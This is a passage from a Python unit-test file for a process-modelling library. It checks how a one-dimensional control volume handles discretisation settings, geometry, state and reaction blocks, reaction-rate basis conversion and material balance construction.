m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
with pytest.raises(ConfigurationError):
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "LAGRANGE-RADAU"})
@pytest.mark.unit
def test_validate_config_args_transformation_scheme_invalid_2():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
with pytest.raises(ConfigurationError):
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "LAGRANGE-LEGENDRE"})
@pytest.mark.unit
def test_validate_config_args_transformation_scheme_invalid_3():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
with pytest.raises(ConfigurationError):
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.collocation",
"transformation_scheme": "BACKWARD"})
@pytest.mark.unit
def test_validate_config_args_transformation_scheme_invalid_4():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
with pytest.raises(ConfigurationError):
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.collocation",
"transformation_scheme": "FORWARD"})
# -----------------------------------------------------------------------------
# Test add_geometry
@pytest.mark.unit
def test_add_geometry_default():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
assert isinstance(m.fs.cv.length_domain, ContinuousSet)
assert len(m.fs.cv.length_domain) == 2
assert isinstance(m.fs.cv.area, Var)
assert len(m.fs.cv.area) == 1.0
assert m.fs.cv.area.value == 1.0
assert isinstance(m.fs.cv.length, Var)
assert len(m.fs.cv.length) == 1.0
assert m.fs.cv.length.value == 1.0
assert m.fs.cv._flow_direction == FlowDirection.forward
@pytest.mark.unit
def test_add_geometry_inherited_domain():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.domain = ContinuousSet(bounds=(0, 1))
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD"})
m.fs.cv.add_geometry(length_domain=m.fs.domain)
assert m.fs.cv.length_domain == m.fs.domain
@pytest.mark.unit
def test_add_geometry_length_domain_set():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD"})
m.fs.cv.add_geometry(length_domain_set=[0.0, 0.2, 0.7, 1.0])
assert len(m.fs.cv.length_domain) == 4
for p in m.fs.cv.length_domain:
assert p in [0.0, 0.2, 0.7, 1.0]
@pytest.mark.unit
def test_add_geometry_flow_direction():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD"})
m.fs.cv.add_geometry(flow_direction=FlowDirection.backward)
assert m.fs.cv._flow_direction == FlowDirection.backward
@pytest.mark.unit
def test_add_geometry_flow_direction_invalid():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD"})
with pytest.raises(ConfigurationError):
m.fs.cv.add_geometry(flow_direction="foo")
@pytest.mark.unit
def test_add_geometry_discretized_area():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"area_definition": DistributedVars.variant})
m.fs.cv.add_geometry()
assert len(m.fs.cv.area) == 2
# -----------------------------------------------------------------------------
# Test apply_transformation
@pytest.mark.unit
def test_apply_transformation_finite_elements_none():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD"})
m.fs.cv.add_geometry()
with pytest.raises(ConfigurationError):
m.fs.cv.apply_transformation()
@pytest.mark.unit
def test_apply_transformation_collocation_points_none():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.collocation",
"transformation_scheme": "LAGRANGE-RADAU",
"finite_elements": 10})
m.fs.cv.add_geometry()
with pytest.raises(ConfigurationError):
m.fs.cv.apply_transformation()
@pytest.mark.unit
def test_apply_transformation_BFD_10():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.apply_transformation()
assert len(m.fs.cv.length_domain) == 11
@pytest.mark.unit
def test_apply_transformation_FFD_12():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "FORWARD",
"finite_elements": 12})
m.fs.cv.add_geometry()
m.fs.cv.apply_transformation()
assert len(m.fs.cv.length_domain) == 13
@pytest.mark.unit
def test_apply_transformation_Lagrange_Radau_8_3():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.collocation",
"transformation_scheme": "LAGRANGE-RADAU",
"finite_elements": 8,
"collocation_points": 3})
m.fs.cv.add_geometry()
m.fs.cv.apply_transformation()
assert len(m.fs.cv.length_domain) == 25
@pytest.mark.unit
def test_apply_transformation_Lagrange_Legendre_3_7():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.collocation",
"transformation_scheme": "LAGRANGE-LEGENDRE",
"finite_elements": 9,
"collocation_points": 4})
m.fs.cv.add_geometry()
m.fs.cv.apply_transformation()
assert len(m.fs.cv.length_domain) == 46
@pytest.mark.unit
def test_apply_transformation_external_domain():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.cset = ContinuousSet(bounds=(0, 1))
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry(length_domain=m.fs.cset)
with pytest.raises(ConfigurationError):
m.fs.cv.apply_transformation()
# -----------------------------------------------------------------------------
# Test add_state_blocks
@pytest.mark.unit
def test_add_state_blocks():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
assert hasattr(m.fs.cv, "properties")
assert len(m.fs.cv.properties) == 2
for x in m.fs.cv.length_domain:
assert len(m.fs.cv.properties[0, x].config) == 3
if x == 0:
assert m.fs.cv.properties[0, x].config.defined_state is True
else:
assert m.fs.cv.properties[0, x].config.defined_state is False
assert m.fs.cv.properties[0, x].config.has_phase_equilibrium is False
assert m.fs.cv.properties[0, x].config.parameters == m.fs.pp
@pytest.mark.unit
def test_add_state_block_forward_flow():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(information_flow=FlowDirection.forward,
has_phase_equilibrium=False)
assert m.fs.cv.properties[0, 0].config.defined_state is True
assert m.fs.cv.properties[0, 1].config.defined_state is False
@pytest.mark.unit
def test_add_state_block_backward_flow():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(information_flow=FlowDirection.backward,
has_phase_equilibrium=False)
assert m.fs.cv.properties[0, 0].config.defined_state is False
assert m.fs.cv.properties[0, 1].config.defined_state is True
@pytest.mark.unit
def test_add_state_blocks_has_phase_equilibrium():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
for x in m.fs.cv.length_domain:
assert m.fs.cv.properties[0, x].config.has_phase_equilibrium is True
@pytest.mark.unit
def test_add_state_blocks_no_has_phase_equilibrium():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
with pytest.raises(ConfigurationError):
m.fs.cv.add_state_blocks()
@pytest.mark.unit
def test_add_state_blocks_custom_args():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10,
"property_package_args": {"test": "test"}})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
for x in m.fs.cv.length_domain:
assert len(m.fs.cv.properties[0, x].config) == 4
assert m.fs.cv.properties[0, x].config.test == "test"
# -----------------------------------------------------------------------------
# Test add_reaction_blocks
@pytest.mark.unit
def test_add_reaction_blocks():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
assert hasattr(m.fs.cv, "reactions")
assert len(m.fs.cv.reactions) == 2
assert len(m.fs.cv.reactions[0, 0].config) == 3
assert m.fs.cv.reactions[0, 0].config.state_block == m.fs.cv.properties
assert m.fs.cv.reactions[0, 0].state_ref == m.fs.cv.properties[0, 0]
assert m.fs.cv.reactions[0, 0].config.has_equilibrium is False
assert m.fs.cv.reactions[0, 0].config.parameters == m.fs.rp
@pytest.mark.unit
def test_add_reaction_blocks_has_equilibrium():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=True)
assert m.fs.cv.reactions[0, 0].config.has_equilibrium is True
@pytest.mark.unit
def test_add_reaction_blocks_no_has_equilibrium():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
with pytest.raises(ConfigurationError):
m.fs.cv.add_reaction_blocks()
@pytest.mark.unit
def test_add_reaction_blocks_custom_args():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10,
"reaction_package_args": {"test1": 1}})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
assert m.fs.cv.reactions[0, 0].config.test1 == 1
# -----------------------------------------------------------------------------
# Test _add_phase_fractions
@pytest.mark.unit
def test_add_phase_fractions():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv._add_phase_fractions()
assert isinstance(m.fs.cv.phase_fraction, Var)
assert len(m.fs.cv.phase_fraction) == 4
assert isinstance(m.fs.cv.sum_of_phase_fractions, Constraint)
@pytest.mark.unit
def test_add_phase_fractions_single_phase():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.pp.del_component(m.fs.pp.phase_list)
m.fs.pp.phase_list = Set(initialize=["p1"])
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv._add_phase_fractions()
assert isinstance(m.fs.cv.phase_fraction, Expression)
assert len(m.fs.cv.phase_fraction) == 2
assert not hasattr(m.fs.cv, "sum_of_phase_fractions")
# -----------------------------------------------------------------------------
# Test reaction rate conversion method
@pytest.mark.unit
def test_rxn_rate_conv_no_rxns():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.pp.basis_switch = 3
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
for t in m.fs.time:
for x in m.fs.cv.length_domain:
for j in m.fs.pp.component_list:
assert m.fs.cv._rxn_rate_conv(
t, x, j, has_rate_reactions=False) == 1
@pytest.mark.unit
def test_rxn_rate_conv_property_basis_other():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.pp.basis_switch = 3
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
for t in m.fs.time:
for x in m.fs.cv.length_domain:
for j in m.fs.pp.component_list:
with pytest.raises(ConfigurationError):
m.fs.cv._rxn_rate_conv(t, x, j, has_rate_reactions=True)
@pytest.mark.unit
def test_rxn_rate_conv_reaction_basis_other():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.rp.basis_switch = 3
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
for t in m.fs.time:
for x in m.fs.cv.length_domain:
for j in m.fs.pp.component_list:
with pytest.raises(ConfigurationError):
m.fs.cv._rxn_rate_conv(t, x, j, has_rate_reactions=True)
@pytest.mark.unit
def test_rxn_rate_conv_both_molar():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
for t in m.fs.time:
for x in m.fs.cv.length_domain:
for j in m.fs.pp.component_list:
assert m.fs.cv._rxn_rate_conv(
t, x, j, has_rate_reactions=True) == 1
@pytest.mark.unit
def test_rxn_rate_conv_both_mass():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.pp.basis_switch = 2
m.fs.rp.basis_switch = 2
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
for t in m.fs.time:
for x in m.fs.cv.length_domain:
for j in m.fs.pp.component_list:
assert m.fs.cv._rxn_rate_conv(
t, x, j, has_rate_reactions=True) == 1
@pytest.mark.unit
def test_rxn_rate_conv_mole_mass_no_mw():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.pp.basis_switch = 1
m.fs.rp.basis_switch = 2
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
for t in m.fs.time:
for x in m.fs.cv.length_domain:
for j in m.fs.pp.component_list:
with pytest.raises(PropertyNotSupportedError):
m.fs.cv._rxn_rate_conv(t, x, j, has_rate_reactions=True)
@pytest.mark.unit
def test_rxn_rate_conv_mass_mole_no_mw():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.pp.basis_switch = 2
m.fs.rp.basis_switch = 1
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
for t in m.fs.time:
for x in m.fs.cv.length_domain:
for j in m.fs.pp.component_list:
with pytest.raises(PropertyNotSupportedError):
m.fs.cv._rxn_rate_conv(t, x, j, has_rate_reactions=True)
@pytest.mark.unit
def test_rxn_rate_conv_mole_mass():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.pp.basis_switch = 1
m.fs.rp.basis_switch = 2
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
for t in m.fs.time:
for x in m.fs.cv.length_domain:
m.fs.cv.properties[t, x].mw_comp = {"c1": 2, "c2": 3}
for j in m.fs.pp.component_list:
assert (m.fs.cv._rxn_rate_conv(
t, x, j, has_rate_reactions=True) ==
1/m.fs.cv.properties[t, x].mw_comp[j])
@pytest.mark.unit
def test_rxn_rate_conv_mass_mole():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.pp.basis_switch = 2
m.fs.rp.basis_switch = 1
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=True)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
for t in m.fs.time:
for x in m.fs.cv.length_domain:
m.fs.cv.properties[t, x].mw_comp = {"c1": 2, "c2": 3}
for j in m.fs.pp.component_list:
assert (m.fs.cv._rxn_rate_conv(
t, x, j, has_rate_reactions=True) ==
m.fs.cv.properties[t, x].mw_comp[j])
# -----------------------------------------------------------------------------
# Test add_material_balances default
@pytest.mark.unit
def test_add_material_balances_default_fail():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
m.fs.pp.default_balance_switch = 2
with pytest.raises(ConfigurationError):
m.fs.cv.add_material_balances(MaterialBalanceType.useDefault)
@pytest.mark.unit
def test_add_material_balances_default():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_material_balances(MaterialBalanceType.useDefault)
assert isinstance(mb, Constraint)
assert len(mb) == 4
for p in m.fs.pp.phase_list:
for j in m.fs.pp.component_list:
with pytest.raises(KeyError):
assert m.fs.cv.material_balances[0, 0, p, j]
assert type(m.fs.cv.material_balances[0, 1, p, j]) is \
_GeneralConstraintData
assert_units_consistent(m)
# -----------------------------------------------------------------------------
# Test add_phase_component_balances
@pytest.mark.unit
def test_add_phase_component_balances_default():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_phase_component_balances()
assert isinstance(mb, Constraint)
assert len(mb) == 4
for p in m.fs.pp.phase_list:
for j in m.fs.pp.component_list:
with pytest.raises(KeyError):
assert m.fs.cv.material_balances[0, 0, p, j]
assert type(m.fs.cv.material_balances[0, 1, p, j]) is \
_GeneralConstraintData
assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_default_FFD():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "FORWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_phase_component_balances()
assert isinstance(mb, Constraint)
assert len(mb) == 4
for p in m.fs.pp.phase_list:
for j in m.fs.pp.component_list:
with pytest.raises(KeyError):
assert m.fs.cv.material_balances[0, 1, p, j]
assert type(m.fs.cv.material_balances[0, 0, p, j]) is \
_GeneralConstraintData
assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_distrubuted_area():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10,
"area_definition": DistributedVars.variant})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_phase_component_balances()
assert isinstance(mb, Constraint)
assert len(mb) == 4
assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_dynamic():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": True, "time_units": units.s})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10,
"dynamic": True})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_phase_component_balances()
assert isinstance(mb, Constraint)
assert len(mb) == 8
assert isinstance(m.fs.cv.phase_fraction, Var)
assert isinstance(m.fs.cv.material_holdup, Var)
assert isinstance(m.fs.cv.material_accumulation, Var)
assert_units_consistent(m)
@pytest.mark.unit
def test_add_phase_component_balances_rate_rxns():
m = ConcreteModel()
m.fs = Flowsheet(default={"dynamic": False})
m.fs.pp = PhysicalParameterTestBlock()
m.fs.rp = ReactionParameterTestBlock(default={"property_package": m.fs.pp})
m.fs.cv = ControlVolume1DBlock(default={
"property_package": m.fs.pp,
"reaction_package": m.fs.rp,
"transformation_method": "dae.finite_difference",
"transformation_scheme": "BACKWARD",
"finite_elements": 10})
m.fs.cv.add_geometry()
m.fs.cv.add_state_blocks(has_phase_equilibrium=False)
m.fs.cv.add_reaction_blocks(has_equilibrium=False)
mb = m.fs.cv.add_phase_component_balances(has_rate_reactions=True)
assert isinstance(mb, Constraint)
assert len(mb) == 4
assert isinstance(m.fs.cv.rate_reaction_generation, Var)
assert isinstance(m.fs.cv.rate_reaction_extent, Var)
